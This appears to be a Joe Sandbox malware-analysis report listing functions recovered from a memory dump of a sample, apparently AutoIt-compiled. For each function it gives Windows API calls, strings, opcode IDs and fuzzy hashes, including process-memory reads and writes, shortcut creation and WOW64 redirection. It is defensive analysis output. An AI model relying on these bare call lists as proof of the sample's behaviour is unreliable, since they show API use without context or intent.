Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: b69a8bde6049e8becadbd4404ed74844bbf43c462bba5f20c0335142f660fc42
Instruction ID: 154c077a9310ef7bff68e3aa09d6725bacd5ef59e4ad3ead1fa41a31777cbedf
Opcode Fuzzy Hash: b69a8bde6049e8becadbd4404ed74844bbf43c462bba5f20c0335142f660fc42
Instruction Fuzzy Hash: 9B011771D01A2DDBCF00EFE4EC99AEDBB78BB09B11F400556E941F2145CB309554A7A1

Function 00F5810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F5812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58157

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
Instruction ID: 5933bc12454caf0675866fd43e7eff7018ffd89be792831af6d08472377caf3e
Opcode Fuzzy Hash: 07a1ff82df0d4630984cfa67e850ecd91b93171648c2007725539f32f34d9c76
Instruction Fuzzy Hash: CEF06271600708AFEB111FA5EC8CEB73BACFF497A5B100025FA45D6150DB619D4AFB60

Function 00F5C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00F5C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00F5C20E
MessageBeep.USER32(00000000), ref: 00F5C226
KillTimer.USER32(?,0000040A), ref: 00F5C242
EndDialog.USER32(?,00000001), ref: 00F5C25C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5c1f65b942a236ebadf7bb407eeee99db9ed88803339f383730b5bc85d066ac6
Instruction ID: 595d28b1740f170055cd65d9e7e45f814d82933dc88df396f81871a59811dc50
Opcode Fuzzy Hash: 5c1f65b942a236ebadf7bb407eeee99db9ed88803339f383730b5bc85d066ac6
Instruction Fuzzy Hash: 600167309047089FEB205B54DD4EBA67778BB00706F000669AA83E14E1DBE4699CAB90

Function 00F013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00F013BF
StrokeAndFillPath.GDI32(?,?,00F3B888,00000000,?), ref: 00F013DB
SelectObject.GDI32(?,00000000), ref: 00F013EE
DeleteObject.GDI32 ref: 00F01401
StrokePath.GDI32(?), ref: 00F0141C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: fa7f19bc02530a081426c473b0759066dfaf9a8869fba4a7faaa6a001ce2d2f4
Instruction ID: 4add7fc4c3b6cf4e75bf486aeb5edea59da8bc11f213383afb5a39f7370b7959
Opcode Fuzzy Hash: fa7f19bc02530a081426c473b0759066dfaf9a8869fba4a7faaa6a001ce2d2f4
Instruction Fuzzy Hash: 5AF0CD30004A0CDFDB115F16ED4DBA83BA5BB11726F188224E4298A0F1CB355595FF50

Function 00F6C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F6C432
CoCreateInstance.OLE32(00F92D6C,00000000,00000001,00F92BDC,?), ref: 00F6C44A

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

CoUninitialize.OLE32 ref: 00F6C6B7

Strings

.lnk, xrefs: 00F6C3C6, 00F6C3EE, 00F6C3F8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: b93cfa55a6eb3d1e985b5e298a4302f8f198f53e0b128bb3751fa26de76e806e
Instruction ID: a30dc4e7efcadd1f3dfd271b39b0ab516ed06ddddcb06cfc922d952e98fd3456
Opcode Fuzzy Hash: b93cfa55a6eb3d1e985b5e298a4302f8f198f53e0b128bb3751fa26de76e806e
Instruction Fuzzy Hash: 1DA14BB1108205AFD700EF54CC81EABB7E8FF85354F40491DF595872A2EBB5EA09EB52

Function 00F12CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F07A51: _memmove.LIBCMT ref: 00F07AAB

__swprintf.LIBCMT ref: 00F12ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F12D66

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 308fcd3328fbd1ee23f3ee35bbcdbc06f8cb9e27e3113a21e8f498a48ec8590d
Instruction ID: cea5ed01b68ec7c6729885fecd5856a1433b4dd7d77bfbd70d800fed1a97ddea
Opcode Fuzzy Hash: 308fcd3328fbd1ee23f3ee35bbcdbc06f8cb9e27e3113a21e8f498a48ec8590d
Instruction Fuzzy Hash: 9C918F725083059FCB14EF64DC85CAFB7A8EF85710F00495DF8459B2A2EA78ED84EB52

Function 00F6B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

CoInitialize.OLE32(00000000), ref: 00F6B9BB
CoCreateInstance.OLE32(00F92D6C,00000000,00000001,00F92BDC,?), ref: 00F6B9D4
CoUninitialize.OLE32 ref: 00F6B9F1

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

Strings

.lnk, xrefs: 00F6B99D, 00F6B9AB

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 65492adf7b65e9aa072afef4d03387957b5d8f62f51b4a81f87405ed0d198a23
Instruction ID: 03e3b23103a8358b9d0cc1862ba86e002405cd44385f272d8afd9a9891c658e6
Opcode Fuzzy Hash: 65492adf7b65e9aa072afef4d03387957b5d8f62f51b4a81f87405ed0d198a23
Instruction Fuzzy Hash: 6CA179756043059FCB00DF14C884D6ABBE5FF89324F048988F8999B3A2DB35ED85EB91

Function 00F2501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00F250AD

Part of subcall function 00F300F0: __87except.LIBCMT ref: 00F3012B

Strings

pow, xrefs: 00F25085, 00F250A2

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: e5901d96e807c6180d16b275d44c049fdb50d92db5cea582b295603fbd82ea52
Instruction ID: b34b53907a9ff9b81c99d493cc15cdb25f147ed3e9192dc59e529fc1c8721bc8
Opcode Fuzzy Hash: e5901d96e807c6180d16b275d44c049fdb50d92db5cea582b295603fbd82ea52
Instruction Fuzzy Hash: CA517861D1C60696DB11B724ED2137E3B90AB40F30F20895BE4D5862A9EE38CDD4FB86

Function 00F16192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F16248
_memmove.LIBCMT ref: 00F162E4
_memset.LIBCMT ref: 00F16308

Strings

ERCP, xrefs: 00F161B3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 6c0a791b945c534a1c006e8fe4e5d42970079d934459c409f2adbf51367bf551
Instruction ID: bbdfb97095c9dfdb171342152ae4a3d0c6d82e43b775ad55c07eb92000a4dbe5
Opcode Fuzzy Hash: 6c0a791b945c534a1c006e8fe4e5d42970079d934459c409f2adbf51367bf551
Instruction Fuzzy Hash: DE51A071A00705DBDB24CF65C981BEAB7F4EF08314F20456EE94AD7241EB74EA84EB50

Function 00F597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F59296,?,?,00000034,00000800,?,00000034), ref: 00F614E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F5983F

Part of subcall function 00F61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F614B1

Part of subcall function 00F613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F61409
Part of subcall function 00F613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F5925A,00000034,?,?,00001004,00000000,00000000), ref: 00F61419
Part of subcall function 00F613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F5925A,00000034,?,?,00001004,00000000,00000000), ref: 00F6142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F598AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F598F9

Strings

@, xrefs: 00F59911

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 03170e3e9c07fb19f4e53c6aaf306c1bc7773a51c76d0287c8e434e83871065b
Instruction ID: 9a46546a5826c1673f149b9c1f2f129ef0a44ffa8fefefed51c2512ada68e166
Opcode Fuzzy Hash: 03170e3e9c07fb19f4e53c6aaf306c1bc7773a51c76d0287c8e434e83871065b
Instruction Fuzzy Hash: E1415176E0021CBFCB14DFA4CC41ADEBBB8EB05300F144159FA45B7141DA746E49DBA0

Function 00F87946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F8F910,00000000,?,?,?,?), ref: 00F879DF
GetWindowLongW.USER32 ref: 00F879FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F87A0C

Strings

SysTreeView32, xrefs: 00F879B1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e8a0ccef2052e02008a15c6a63460f881005f9eb74a26f116738bcaa3fd19058
Instruction ID: ab80116afd2f5fc0678988b5af13a2bc363a238dcb3c31ecc04d1159e593c8e9
Opcode Fuzzy Hash: e8a0ccef2052e02008a15c6a63460f881005f9eb74a26f116738bcaa3fd19058
Instruction Fuzzy Hash: 9D31CE3160420AAFDB15AF38CC45BEB77A9EB05334F244725F875A22E0D734E991AB60

Function 00F873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F87461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F87475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F87499

Strings

SysMonthCal32, xrefs: 00F8742C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9a2adda98e46be9c6283e945e48dbac84a543ef8ff0679a48a7d8bb283d89692
Instruction ID: 73eeef06359cc3687770bbfe1db89de8c3831dbb02f3e6131f03d9e95c728214
Opcode Fuzzy Hash: 9a2adda98e46be9c6283e945e48dbac84a543ef8ff0679a48a7d8bb283d89692
Instruction Fuzzy Hash: 4F219132500218AFDF11EF94CC46FEA3B69EF48724F210214FE156B1D0DA75EC95ABA0

Function 00F87B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F87C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F87C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F87C5F

Strings

msctls_updown32, xrefs: 00F87BC4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 6631ca0e834ee8013283324c85c298b13aa8537b0c357c46a1c194339d1c7740
Instruction ID: dc2e3514e1a3ee145db52deb5eac2c63aeb2036123a9651ff5445b008e8d5d9a
Opcode Fuzzy Hash: 6631ca0e834ee8013283324c85c298b13aa8537b0c357c46a1c194339d1c7740
Instruction Fuzzy Hash: 3D215EB5604209AFDB11EF24DCC2DA777EDEF4A764B240059FA019B3A1CB71EC51AB60

Function 00F86CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F86D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F86D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F86D70

Strings

Listbox, xrefs: 00F86D08

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 8bdd0682a299f7397988808d31649966c7a8a5ee9641b5fb3b31ef61f3783efe
Instruction ID: 1c0468c194a18ebb74abb5407bf85c1a785785651144570489e9df45150ff3ff
Opcode Fuzzy Hash: 8bdd0682a299f7397988808d31649966c7a8a5ee9641b5fb3b31ef61f3783efe
Instruction Fuzzy Hash: 7A219232A10118BFDF129F54DC45FFB3BBAEF89760F118124F9459B1A0CA71AC51ABA0

Function 00F8770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F87772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F87787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F87794

Strings

msctls_trackbar32, xrefs: 00F87749

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d3feb1258f86b59743edca54e8f61c1417517936dc955f67a9360426ec85ff58
Instruction ID: c64c4d09b92263b6ffcddb2c674b05008093ae3f0f81ed01076437c5c634c19a
Opcode Fuzzy Hash: d3feb1258f86b59743edca54e8f61c1417517936dc955f67a9360426ec85ff58
Instruction Fuzzy Hash: 0B110A72654309BFEF106F65CC05FEB7769EF89B64F114118F641960D0D671E851EB20

Function 00F04C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F04B83,?), ref: 00F04C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00F04C50
kernel32.dll, xrefs: 00F04C3F

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 0fc22282d941b3f467a94b3d52e0591d684ed033876cbbc86b1b06f5a952dfe3
Instruction ID: a142311eb13fd290619b5032ed7e80fc481f908a933a33f7bf25dbe1af90bf06
Opcode Fuzzy Hash: 0fc22282d941b3f467a94b3d52e0591d684ed033876cbbc86b1b06f5a952dfe3
Instruction Fuzzy Hash: C1D0C770A00B13CFEB209F32C80C29A72E4AF00765B10C83E95A2C61A0E670E8C0EB20

Function 00F04C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F04BD0,?,00F04DEF,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00F04C1D
kernel32.dll, xrefs: 00F04C0C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
